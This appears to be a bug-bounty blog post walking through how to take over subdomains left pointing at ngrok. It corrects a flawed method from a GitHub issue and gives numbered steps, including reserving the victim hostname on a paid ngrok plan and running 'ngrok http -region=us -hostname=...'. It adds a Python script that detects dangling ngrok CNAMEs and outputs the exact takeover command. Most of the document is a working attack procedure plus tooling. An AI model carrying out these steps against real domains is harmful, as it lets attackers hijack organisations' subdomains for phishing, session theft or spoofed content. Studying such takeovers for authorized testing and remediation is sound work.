This post is about taking over vulnerable subdomains that point at the ngrok service.
A few days back streaak sent me a URL and told me to take over the subdomain using the steps described here: https://github.com/EdOverflow/can-i-take-over-xyz/issues/85

So I set up my ngrok account to take over the subdomain, but the steps didn't work as described in the URL above. When you run the command ./ngrok http 80 -subdomain cnameentry it should have taken over the subdomain, but it didn't. It only runs ngrok on the CNAME entry, not on the actual subdomain.
So I decided to test further and set up ngrok on my own subdomain.

Taking over a vulnerable subdomain:

If you visit the vulnerable subdomain, the error will be: Tunnel subdomain.example.com not found

Check the CNAME entry of the subdomain; it will be something like xxxxxxxx.cname.us.ngrok.io (the "us" part is the ngrok region, which you will need again in step 5).

  1. Set up an account on https://ngrok.com/

  2. Custom subdomains (reserved domains) are only available on the paid version of ngrok, so you will need to purchase a paid plan: https://dashboard.ngrok.com/billing

  3. Once your account is ready, set up ngrok on your local machine by following these steps: https://dashboard.ngrok.com/get-started

  4. Once the local setup is done, go to https://dashboard.ngrok.com/reserved, where you can reserve the vulnerable subdomain: enter the full subdomain (subdomain.example.com, not the xxxxxxxx CNAME entry) and click Reserve.

  5. Now go to your local machine and run this command to take over the vulnerable subdomain (the region must match the one in the CNAME entry): ngrok http -region=us -hostname=subdomain.example.com 80
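As an added example (not code from the original post), the checks from the steps above folded into a small Python script: it parses the CNAME target, pulls the region out of it, confirms the "Tunnel ... not found" page, and returns the name to reserve together with the exact command from step 5. The CNAME shape (<id>.cname.<region>.ngrok.io) is assumed from the single example in the post, and the sample DNS and HTTP evidence is constructed for illustration; for a real target you would feed it the output of dig +short CNAME and curl.

```python
import re

# Shape of an ngrok CNAME target as shown in the post: <id>.cname.<region>.ngrok.io
# The id charset and the two-letter region are assumptions based on that one example.
NGROK_CNAME_RE = re.compile(
    r"^(?P<tunnel_id>[a-z0-9-]+)\.cname\.(?P<region>[a-z]{2})\.ngrok\.io\.?$",
    re.IGNORECASE,
)


def parse_ngrok_cname(cname_target):
    """Return (tunnel_id, region) if the CNAME target is an ngrok cname host, else None.

    A trailing dot (as printed by dig) is tolerated.
    """
    match = NGROK_CNAME_RE.match(cname_target.strip())
    if match is None:
        return None
    return match.group("tunnel_id").lower(), match.group("region").lower()


def is_dangling(hostname, http_body):
    """ngrok serves 'Tunnel <host> not found' when no tunnel claims the hostname."""
    return ("Tunnel %s not found" % hostname) in http_body


def takeover_command(hostname, region, local_port=80):
    """ngrok v2 invocation from step 5.

    -hostname binds the victim's own name (after it is reserved in the dashboard);
    -subdomain would only bind <name>.<region>.ngrok.io, which is why the steps
    in the linked GitHub issue did not work.
    """
    return "ngrok http -region=%s -hostname=%s %d" % (region, hostname, local_port)


def assess(hostname, cname_target, http_body):
    """Combine the DNS and HTTP evidence into a verdict plus the exact next steps."""
    parsed = parse_ngrok_cname(cname_target)
    if parsed is None:
        return {"vulnerable": False, "reason": "CNAME does not point at ngrok"}
    tunnel_id, region = parsed
    if not is_dangling(hostname, http_body):
        return {
            "vulnerable": False,
            "region": region,
            "reason": "a tunnel already answers for this hostname",
        }
    return {
        "vulnerable": True,
        "region": region,
        "tunnel_id": tunnel_id,
        "reserve": hostname,  # enter this at https://dashboard.ngrok.com/reserved
        "command": takeover_command(hostname, region),
    }


# Constructed sample evidence (hostname, CNAME target, HTTP body); not from any real target.
SAMPLES = [
    # dangling: ngrok CNAME and the "not found" page
    ("subdomain.example.com", "abcd1234.cname.us.ngrok.io.",
     "<html><body>Tunnel subdomain.example.com not found</body></html>"),
    # claimed: ngrok CNAME but a live tunnel answers
    ("app.example.com", "efgh5678.cname.eu.ngrok.io",
     "<html><body>Welcome to the app</body></html>"),
    # not ngrok at all, even though the page text looks similar
    ("www.example.com", "www.example.com.cdn.example.net",
     "<html><body>Tunnel www.example.com not found</body></html>"),
]

if __name__ == "__main__":
    for host, cname, body in SAMPLES:
        print(host, "->", assess(host, cname, body))
```

The script deliberately takes the DNS and HTTP evidence as arguments instead of doing live lookups, so it runs offline and is easy to unit test; wire it to dig +short CNAME <host> and curl -s http://<host>/ when checking a target you are authorized to test.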



Paresh Parmar
